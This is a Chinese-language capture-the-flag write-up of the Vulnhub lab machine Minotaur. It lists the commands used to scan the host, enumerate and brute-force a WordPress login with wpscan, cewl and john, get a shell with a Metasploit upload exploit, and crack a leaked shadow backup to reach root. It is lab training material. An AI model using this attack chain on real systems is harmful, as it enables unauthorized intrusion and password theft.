【Vulnhub】SecTalks: BNE0x00 - Minotaur

admin 2020年9月16日10:30:59评论244 views字数 758阅读2分31秒阅读模式

【Vulnhub】SecTalks: BNE0x00 - Minotaur


扫不到 IP 按照之前的方法,但是这里是 dhcp 被注释掉了

把那些白的删掉,箭头指向的那一行的注释去掉


【Vulnhub】SecTalks: BNE0x00 - Minotaur


nmap -p- -A 192.168.149.196


【Vulnhub】SecTalks: BNE0x00 - Minotaur


ftp 匿名登录进去啥都没有


【Vulnhub】SecTalks: BNE0x00 - Minotaur


80 端口有个 apache 的默认页面

然后扫描目录扫出来一个 bull,访问是一个 wordpress 的博客,扫描一波,出来个用户名 bully

wpscan --url http://192.168.149.196/bull/ -eu


【Vulnhub】SecTalks: BNE0x00 - Minotaur


然后爆破一下(字典用 cewl 获取页面上的内容)

cewl -w words.txt -m 6 http://192.168.149.196/bull/

-m 这个参数指定的是长度

john --wordlist=words.txt --rules --stdout > words-john.txt

john 处理一下,生成一些组合出来的


wpscan --url http://192.168.149.196/bull/ --passwords ./words-john.txt -U bully

然后用组合出来的字典跑出来 bully 账户密码为 Bighornedbulls


【Vulnhub】SecTalks: BNE0x00 - Minotaur


然后可以用 msf 直接来拿 shell

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.149.196
set TARGETURI /bull/
set WP_USER bully
set WP_PASSWORD Bighornedbulls

【Vulnhub】SecTalks: BNE0x00 - Minotaur


在 /var/www/html 目录下有个 flag

/tmp 目录下也有,同时还有个 shadow.bak


【Vulnhub】SecTalks: BNE0x00 - Minotaur


保存出来用 john 暴力跑一下,得到:


【Vulnhub】SecTalks: BNE0x00 - Minotaur


切换用户 heffer 在用户目录得到一个 flag


【Vulnhub】SecTalks: BNE0x00 - Minotaur


切换 minotaur 同样在用户目录得到一个 flag

用 sudo -l 查看一下发现可以用 sudo 执行任意的命令?


【Vulnhub】SecTalks: BNE0x00 - Minotaur

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月16日10:30:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Vulnhub】SecTalks: BNE0x00 - Minotaurhttp://cn-sec.com/archives/134364.html

发表评论

匿名网友 填写信息